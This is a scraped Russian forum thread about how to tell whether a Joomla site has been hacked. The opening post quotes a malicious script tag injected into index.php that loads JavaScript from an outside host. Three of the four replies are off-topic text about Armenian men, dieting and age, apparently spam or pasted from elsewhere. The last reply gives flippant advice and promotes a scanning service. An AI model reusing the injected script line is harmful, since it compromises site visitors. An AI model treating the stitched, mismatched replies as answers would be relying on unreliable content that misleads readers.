Форум группы "Русский размер"

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Форум группы "Русский размер" » Проекты » Как проверить сайт на взлом?

Как проверить сайт на взлом?

Сообщений 1 страница 5 из 5

1

Вчера вечером из яндекс.метрики приходит письмо о том, что мой сайт не доступен. Я обращаюсь в службу поддержки хостера, там мне отвечают сто на хостинге все в порядке проверьте сам сайт, для вывода ошибок добавьте код
php_value display_errors 1
php_value error_reporting 2047
в файл .htaccess. После добавления кода сайт выдал синтаксическую ошибку в файле index.php в корне сайта (сайт на джумле) в последней строке.
Строка следующая : <script src="http://byhosted.com/ajaxengine.js"></script>
Как туда попала эта строка ума не приложу...
Может сайт взломали? Как это можно проверить?

Отредактировано Климча (2018-06-19 17:44:22)

0

2

Да, армян действительно много в моем родном городе Сочи. У многих мужчин прекрасное чувство юмора, весёлые, позитивные, добрые,как солнышко. И да, ухаживают красиво.

0

3

Посадите его на вегатарианскую почти диету, кормите мясом не более раза в месяц. Плюс спорт, активные виды деятельности, выбрасывать переизбыток энергии, трансформировать это всё в бензин, и на нём действовать. Мне помогло. Можно конечно ещё таблетками его кормить, те что действенны только по рецепту и через психотерапевта в лучшем случае, но они просто тормозят, угнетают, да и диагноз ему могут поставить, причём он даже не узнает об этом, просто как галочку, на учёт поставят и всё, типа какая та там возбудимая психопатия с какими то там бла бла бла расстройствами, потом не отмоется короче.

0

4

Да разные смыслы могут быть. Например, незнакомого мужчину может оттолкнуть реальная цифра, а если не будет точно знать, постепенно привыкнет к женщине, гадая, сколько точно лет. Пока гадает, интерес может появиться. А если сразу знает, то может и не начинать общение, под влиянием стереотипов - просто испугается возраста...

0

5

Тупо пишешь ф-ции логирования всех действий, делаешь бэкап копию
а потом с радостью постишь на ВСЕ хакерские форумы.
Или можете обратиться за профессиональной помощью в  https://metascan.ru
Обещаю -будете спать спокойно!

0

Вы здесь » Форум группы "Русский размер" » Проекты » Как проверить сайт на взлом?